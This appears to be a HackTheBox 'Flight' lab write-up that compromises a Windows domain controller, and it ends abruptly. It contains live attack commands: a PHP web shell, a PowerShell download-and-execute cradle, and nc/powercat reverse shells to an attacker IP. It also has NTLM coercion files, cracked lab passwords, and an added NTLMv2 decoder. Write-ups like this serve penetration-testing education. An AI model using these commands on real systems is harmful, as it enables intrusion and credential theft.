# HTB — Flight

AD · Hard · Windows

LFI via lang parameter captures NTLM hash with Responder. Password spray, IIS WebDAV shell upload, RunasCs for lateral movement to Domain Admin.

January 21, 2025 · HackTheBox

#AD #LFI #NTLM #WebDAV
## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.187
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 22:40 EST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.01% done
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.34% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.74% done
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 1.08% done; ETC: 22:46 (0:06:05 remaining)
Stats: 0:02:01 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 77.78% done; ETC: 22:42 (0:00:09 remaining)
Nmap scan report for 10.10.11.187
Host is up (0.022s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-22 10:41:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-22T10:42:45
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 19.16 ms 10.10.14.1
2 19.25 ms 10.10.11.187
```
## 80

```sh
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-title: g0 Aviation
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods:
|_ Potentially risky methods: TRACE
```

## dirsearch

```sh
dirsearch -u http://10.10.11.187
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Flight/reports/http_10.10.11.187/_25-01-21_23-37-44.txt
Target: http://10.10.11.187/
[23:37:44] Starting:
...
[23:37:58] 403 - 301B - /cgi-bin/
[23:37:58] 200 - 2KB - /cgi-bin/printenv.pl
[23:38:00] 301 - 334B - /css -> http://10.10.11.187/css/
[23:38:04] 503 - 401B - /examples
[23:38:04] 503 - 401B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[23:38:04] 503 - 401B - /examples/jsp/index.html
```
## 445

```sh
445/tcp open microsoft-ds?
```

## vhost fuzzing

```sh
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://flight.htb/ -H 'Host: FUZZ.flight.htb' -fs 7069
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://flight.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.flight.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 7069
________________________________________________
school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 103ms]
:: Progress: [4989/4989] :: Job [1/1] :: 341 req/sec :: Duration: [0:00:06] :: Errors: 0 ::
```

school.flight.htb
## LFI

```txt
?view=/windows/win.ini
```

- candidate paths taken from this list:
- https://github.com/DragonJAR/Security-Wordlist/blob/main/LFI-WordList-Windows

```txt
c:/xampp/apache/logs/access.log
c:/xampp/apache/logs/error.log
c:/xampp/mysql/data/mysql-bin.index
c:/xampp/mysql/data/mysql.err
c:/xampp/mysql/data/{IPDELHOST}.err
c:/xampp/sendmail/sendmail.log
c:/xampp/apache/conf/httpd.conf
c:/xampp/FileZillaFTP/FileZilla Server.xml
c:/xampp/MercuryMail/mercury.ini
c:/xampp/php/php.ini
c:/xampp/phpMyAdmin/config.inc.php
c:/xampp/sendmail/sendmail.ini
c:/xampp/webalizer/webalizer.conf
c:/xampp/htdocs/aca.txt
c:/xampp/htdocs/admin.php
c:/xampp/htdocs/leer.txt
```
## responder

```sh
impacket-smbserver share -smb2support ./
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.187,50095)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:ef85d230...:0101000000000000000bf9688a6cdb01d369a972ef674504000000000100100045006f007a0079004e00740077004c000300100045006f007a0079004e00740077004c000200100065005200470072007600660051007500040010006500520047007200760066005100750007000800000bf9688a6cdb0106000400020000000800300030000000000000000000000000300000afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc400a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000
```

## hashcat

```sh
hashcat -m 5600 ntlmv2.hash /usr/share/wordlists/rockyou.txt --force
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:ef85d230...:0101000000000000000bf9688a6cdb01d369a972ef674504000000000100100045006f007a0079004e00740077004c000300100045006f007a0079004e00740077004c000200100065005200470072007600660051007500040010006500520047007200760066005100750007000800000bf9688a6cdb0106000400020000000800300030000000000000000000000000300000afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc400a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000:S@Ss!K@*t13
```

## creds

```txt
svc_apache:S@Ss!K@*t13
```
```sh
nxc smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
```

```sh
nxc smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' --users
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.187 445 G0 Administrator 2022-09-22 20:17:02 0 Built-in account for administering the computer/domain
SMB 10.10.11.187 445 G0 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.187 445 G0 krbtgt 2022-09-22 19:48:01 0 Key Distribution Center Service Account
SMB 10.10.11.187 445 G0 S.Moon 2022-09-22 20:08:22 0 Junion Web Developer
SMB 10.10.11.187 445 G0 R.Cold 2022-09-22 20:08:22 0 HR Assistant
SMB 10.10.11.187 445 G0 G.Lors 2022-09-22 20:08:22 0 Sales manager
SMB 10.10.11.187 445 G0 L.Kein 2022-09-22 20:08:22 0 Penetration tester
SMB 10.10.11.187 445 G0 M.Gold 2022-09-22 20:08:22 0 Sysadmin
SMB 10.10.11.187 445 G0 C.Bum 2022-09-22 20:08:22 0 Senior Web Developer
SMB 10.10.11.187 445 G0 W.Walker 2022-09-22 20:08:22 0 Payroll officer
SMB 10.10.11.187 445 G0 I.Francis 2022-09-22 20:08:22 0 Nobody knows why he's here
SMB 10.10.11.187 445 G0 D.Truff 2022-09-22 20:08:22 0 Project Manager
SMB 10.10.11.187 445 G0 V.Stevens 2022-09-22 20:08:22 0 Secretary
SMB 10.10.11.187 445 G0 svc_apache 2022-09-22 20:08:23 0 Service Apache web
SMB 10.10.11.187 445 G0 O.Possum 2022-09-22 20:08:23 0 Helpdesk
SMB 10.10.11.187 445 G0 [*] Enumerated 15 local users: flight
```

## password reuse

```sh
nxc smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' --continue-on-success
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
```

## creds

```txt
S.Moon:S@Ss!K@*t13
svc_apache:S@Ss!K@*t13
```

## bloodhound
```sh
sudo bloodhound-python -u 'S.Moon' -p 'S@Ss!K@*t13' -ns 10.10.11.187 -d flight.htb -c all
```

```sh
nxc smb 10.10.11.187 -u 's.moon' -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\s.moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ
```

## ntlm_theft.py
```sh
wget https://raw.githubusercontent.com/Greenwolf/ntlm_theft/refs/heads/master/ntlm_theft.py
```

```sh
python3 ntlm_theft.py -g all -s 10.10.14.6 -f test
Created: test/test.scf (BROWSE TO FOLDER)
Created: test/test-(url).url (BROWSE TO FOLDER)
Created: test/test-(icon).url (BROWSE TO FOLDER)
Created: test/test.lnk (BROWSE TO FOLDER)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test-(externalcell).xlsx (OPEN)
Created: test/test.wax (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: test/Autorun.inf (BROWSE TO FOLDER)
Created: test/desktop.ini (BROWSE TO FOLDER)
Generation Complete.
```

```sh
smbclient //10.10.11.187/Shared -U 's.moon%S@Ss!K@*t13'
```

- the share does not let you upload some of the files
- by trial and error, these 3 files produced an NTLMv2 hash

```sh
smb: \> dir
. D 0 Wed Jan 22 15:47:40 2025
.. D 0 Wed Jan 22 15:47:40 2025
desktop.ini A 46 Wed Jan 22 15:46:55 2025
test-(fulldocx).xml A 72584 Wed Jan 22 15:47:40 2025
test.application A 1649 Wed Jan 22 15:47:08 2025
5056511 blocks of size 4096. 1230393 blocks available
```
```sh
impacket-smbserver share -smb2support ./
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.187,51544)
[*] AUTHENTICATE_MESSAGE (flight.htb\c.bum,G0)
[*] User G0\c.bum authenticated successfully
[*] c.bum::flight.htb:aaaaaaaaaaaaaaaa:63f14424...:010100000000000000007436d46cdb016b0cb74a0ee6ddf0000000000100100041006f00770052004f006100550075000300100041006f00770052004f006100550075000200100048004c006c0074007a005500630052000400100048004c006c0074007a005500630052000700080000007436d46cdb0106000400020000000800300030000000000000000000000000300000afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc400a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000
```

## hashcat

```sh
hashcat -m 5600 c.bum_ntlmv2.txt /usr/share/wordlists/rockyou.txt
C.BUM::flight.htb:aaaaaaaaaaaaaaaa:63f14424...:010100000000000000007436d46cdb016b0cb74a0ee6ddf0000000000100100041006f00770052004f006100550075000300100041006f00770052004f006100550075000200100048004c006c0074007a005500630052000400100048004c006c0074007a005500630052000700080000007436d46cdb0106000400020000000800300030000000000000000000000000300000afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc400a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0036000000000000000000:Tikkycoll_431012284
```

## creds

```txt
c.bum:Tikkycoll_431012284
```
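Both NTLMv2 captures above (the svc_apache hash from the LFI and the c.bum hash from the ntlm_theft files) end in the same long blob. As an added example, not code from the writeup, this Python decoder parses a hashcat 5600 / Responder line (USER::DOMAIN:CHALLENGE:PROOF:BLOB) and walks the blob's AV_PAIRs; on the responder's side that is what tells you when the coerced authentication happened and which target (here cifs/10.10.14.6, the capture listener, not the DC: the names and timestamp are echoed from the challenging server's TargetInfo) the client authenticated to. The blob is the svc_apache one from the page; because the page truncates the NTProofStr, a constructed all-zero placeholder stands in for it.

```python
"""Decode the NTLMv2 blob of a hashcat -m 5600 / Responder line (MS-NLMP 2.2.2.7)."""
import struct
from datetime import datetime, timedelta, timezone
# MS-NLMP 2.2.2.1 AV_PAIR AvId values
AV_IDS = {
    0: "MsvAvEOL", 1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName",
    3: "MsvAvDnsComputerName", 4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName",
    6: "MsvAvFlags", 7: "MsvAvTimestamp", 8: "MsvAvSingleHost",
    9: "MsvAvTargetName", 10: "MsvAvChannelBindings",
}
UTF16_IDS = {1, 2, 3, 4, 5, 9}  # AV values that are UTF-16LE strings

# Constructed input: the svc_apache capture shown in the writeup.  The page
# truncates the NTProofStr, so an all-zero placeholder stands in for it.
SAMPLE_BLOB = "".join([
    "0101000000000000",  # RespType, HiRespType, Reserved1, Reserved2
    "000bf9688a6cdb01",  # TimeStamp (FILETIME, little endian)
    "d369a972ef674504",  # ClientChallenge
    "00000000",          # Reserved3
    "01001000" "45006f007a0079004e00740077004c00",  # MsvAvNbComputerName
    "03001000" "45006f007a0079004e00740077004c00",  # MsvAvDnsComputerName
    "02001000" "65005200470072007600660051007500",  # MsvAvNbDomainName
    "04001000" "65005200470072007600660051007500",  # MsvAvDnsDomainName
    "07000800" "000bf9688a6cdb01",                  # MsvAvTimestamp
    "06000400" "02000000",                          # MsvAvFlags
    "08003000" "30000000" "00000000" "0000000000300000"  # MsvAvSingleHost (48 bytes)
    "afdfdb7deda35026555873e51dcb4a0c8333adc0040e6dff570eb0de4098cc40",
    "0a001000" + "00" * 16,                         # MsvAvChannelBindings
    "09001e00" "63006900660073002f00310030002e00310030002e00310034002e003600",  # MsvAvTargetName
    "00000000",          # MsvAvEOL
    "00000000",          # Reserved4
])
SAMPLE_LINE = "svc_apache::flight:aaaaaaaaaaaaaaaa:" + "00" * 16 + ":" + SAMPLE_BLOB

def filetime_to_datetime(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01) -> aware UTC datetime."""
    seconds, rem = divmod(ft - 116444736000000000, 10_000_000)  # offset to 1970-01-01
    return datetime.fromtimestamp(seconds, tz=timezone.utc) + timedelta(microseconds=rem // 10)

def parse_av_pairs(data):
    """Walk the AV_PAIR list (AvId u16, AvLen u16, value) up to MsvAvEOL."""
    pairs, offset = {}, 0
    while offset + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        value = data[offset + 4:offset + 4 + av_len]
        offset += 4 + av_len
        if av_id == 0:
            break
        name = AV_IDS.get(av_id, f"Unknown({av_id})")
        if av_id in UTF16_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 6:
            pairs[name] = struct.unpack("<I", value)[0]
        elif av_id == 7:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value.hex()
    return pairs

def parse_ntlmv2_line(line):
    """Split a USER::DOMAIN:CHALLENGE:PROOF:BLOB line and decode the blob."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("RespType/HiRespType != 1: not an NTLMv2 response")
    timestamp, client_challenge = struct.unpack_from("<Q8s", blob, 8)
    return {
        "user": user, "domain": domain, "server_challenge": server_challenge,
        "nt_proof_str": nt_proof, "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge.hex(),
        "av_pairs": parse_av_pairs(blob[28:]),  # AV_PAIRs follow the 28-byte fixed part
    }

def coerced_target(result):
    """(service, host) from MsvAvTargetName, i.e. the listener the victim authenticated to."""
    target = result["av_pairs"].get("MsvAvTargetName", "")
    if "/" not in target:
        return None
    return tuple(target.split("/", 1))
```

Run against the c.bum line from the second capture, the decoder reports the same cifs/10.10.14.6 target, which is how a responder correlates two coerced authentications to one listener.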
```sh
nxc smb 10.10.11.187 -u 'c.bum' -p 'Tikkycoll_431012284'
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
```

## shell as svc_apache
```sh
nxc smb 10.10.11.187 -u 'c.bum' -p 'Tikkycoll_431012284' --shares
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE
```

```sh
echo '<?php system($_GET[0]);?>' > shell.php
```

```sh
smb: \flight.htb\> put shell.php
```

```sh
powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.6/powercat.ps1');powercat -c 10.10.14.6 -p 1234 -e cmd
```

## powercat rev shell
```sh
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.187] 51620
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\flight.htb>whomi
whomi
'whomi' is not recognized as an internal or external command,
operable program or batch file.
C:\xampp\htdocs\flight.htb>whoami
whoami
flight\svc_apache
```

## winpeas
```sh
C:\Users\svc_apache>certutil.exe -f -urlcache -split http://10.10.14.6/winPEASx64.exe winPEASx64.exe
```

## lateral movement
```sh
C:\Users\Public>certutil.exe -f -urlcache -split http://10.10.14.6/nc.exe nc.exe
```

```sh
PS C:\users\svc_apache> certutil.exe -f -urlcache -split http://10.10.14.6/Invoke-RunasCs.ps1 Invoke-RunasCs.ps1
PS C:\users\svc_apache> Import-Module .\Invoke-RunasCs.ps1
PS C:\users\svc_apache> Invoke-RunasCs c.bum Tikkycoll_431012284 -ProcessTimeout 0 -Command "C:\Users\Public\nc.exe 10.10.14.6 1235 -e cmd"
```

```sh
nc -lvnp 1235
listening on [any] 1235 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.187] 52367
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bum
```

## user.txt
```sh
C:\Users\C.Bum\Desktop>type user.txt
type user.txt
24081470...
```

```sh
C:\inetpub>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1DF4-493D
Directory of C:\inetpub
01/22/2025 05:42 PM <DIR> .
01/22/2025 05:42 PM <DIR> ..
09/22/2022 11:24 AM <DIR> custerr
01/22/2025 05:42 PM <DIR> development
09/22/2022 12:08 PM <DIR> history
09/22/2022 11:32 AM <DIR> logs
09/22/2022 11:24 AM <DIR> temp
09/22/2022 11:28 AM <DIR> wwwroot
0 File(s) 0 bytes
8 Dir(s) 4,976,087,040 bytes free
C:\inetpub>cd deveopment
cd deveopment
The system cannot find the path specified.
C:\inetpub>cd development
cd development
C:\inetpub\development>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1DF4-493D
Directory of C:\inetpub\development
01/22/2025 05:42 PM <DIR> .
01/22/2025 05:42 PM <DIR> ..
04/16/2018 01:23 PM 9,371 contact.html
01/22/2025 05:42 PM <DIR> css
01/22/2025 05:42 PM <DIR> fonts
01/22/2025 05:42 PM <DIR> img
04/16/2018 01:23 PM 45,949 index.html
01/22/2025 05:42 PM <DIR> js
2 File(s) 55,320 bytes
6 Dir(s) 4,976,087,040 bytes free
```

```sh
C:\inetpub\development>echo 'test'>test.txt
echo 'test'>test.txt
```
```sh
C:\inetpub\development>netstat -a
netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 g0:0 LISTENING
TCP 0.0.0.0:88 g0:0 LISTENING
TCP 0.0.0.0:135 g0:0 LISTENING
TCP 0.0.0.0:389 g0:0 LISTENING
TCP 0.0.0.0:443 g0:0 LISTENING
TCP 0.0.0.0:445 g0:0 LISTENING
TCP 0.0.0.0:464 g0:0 LISTENING
TCP 0.0.0.0:593 g0:0 LISTENING
TCP 0.0.0.0:636 g0:0 LISTENING
TCP 0.0.0.0:3268 g0:0 LISTENING
TCP 0.0.0.0:3269 g0:0 LISTENING
TCP 0.0.0.0:5985 g0:0 LISTENING
TCP 0.0.0.0:8000 g0:0 LISTENING
TCP 0.0.0.0:9389 g0:0 LISTENING
TCP 0.0.0.0:47001 g0:0 LISTENING
TCP 0.0.0.0:49664 g0:0 LISTENING
TCP 0.0.0.0:49665 g0:0 LISTENING
TCP 0.0.0.0:49666 g0:0 LISTENING
TCP 0.0.0.0:49667 g0:0 LISTENING
TCP 0.0.0.0:49673 g0:0 LISTENING
TCP 0.0.0.0:49674 g0:0 LISTENING
TCP 0.0.0.0:49682 g0:0 LISTENING
TCP 0.0.0.0:49693 g0:0 LISTENING
TCP 0.0.0.0:49705 g0:0 LISTENING
TCP 10.10.11.187:53 g0:0 LISTENING
```

## port 8000 development

```sh
C:\inetpub\development>curl http://127.0.0.1:8000
curl http://127.0.0.1:8000
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>IIS 10.0 Detailed Error - 403.14 - Forbidden</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;}
code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;}
.config_source code{font-size:.8em;color:#000000;}
pre{margin:0;font-size:1.4em;word-wrap:break-word;}
ul,ol{margin:10px 0 10px 5px;}
ul.first,ol.first{margin-top:5px;}
fieldset{padding:0 15px 10px 15px;word-break:break-all;}
.summary-container fieldset{padding-bottom:5px;margin-top:4px;}
legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;}
legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px;
</head>
<body>
<div id="content">
<div class="content-container">
<h3>HTTP Error 403.14 - Forbidden</h3>
<h4>The Web server is configured to not list the contents of this directory.</h4>
</div>
<div class="content-container">
<fieldset><h4>Most likely causes:</h4>
</table>
</div>
<div id="details-right">
100 5069 100 5069 0 0 3183 0 0:00:01 0:00:01 --:--:-- 3186
ng="0">
<tr class="alt"><th>Requested URL</th><td> http://127.0.0.1:8000/</td></tr>
<tr><th>Physical Path</th><td> C:\inetpub\development</td></tr>
<tr class="alt"><th>Logon Method</th><td> Anonymous</td></tr>
<tr><th>Logon User</th><td> Anonymous</td></tr>
</table>
<div class="clear"></div>
</div>
</fieldset>
</div>
<div class="content-container">
<fieldset><h4>More Information:</h4>
This error occurs when a document is not specified in the URL, no default document is specified for the Web site or application, and directory listing is not enabled for the Web site or application. This setting may be disabled on purpose to secure the contents of the server.
<p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=403,14,0x00000000,17763">View more information »</a></p>
</fieldset>
</div>
</div>
</body>
</html>
```
```sh
C:\Users\C.Bum>certutil.exe -f -urlcache -split http://10.10.14.6/ligo-windows-agent.exe ligo-windows-agent.exe
```

```sh
C:\Users\C.Bum>certutil.exe -f -urlcache -split http://10.10.14.6/winPEASx64.exe winPEASx64.exe
```

## development folder

```sh
C:\inetpub\development>icacls .\
icacls .\
.\ flight\C.Bum:(OI)(CI)(W)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(OI)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
```

## ligolo local port forwarding
```sh
./ligo-linux-proxy -selfcert
```

```sh
sudo ip tuntap add user sake mode tun ligolo
sudo ip link set ligolo up
```

```powershell
